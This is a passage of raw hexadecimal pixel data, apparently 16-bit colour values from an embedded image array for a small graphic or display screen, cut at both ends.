0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xffff, 0xffff, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 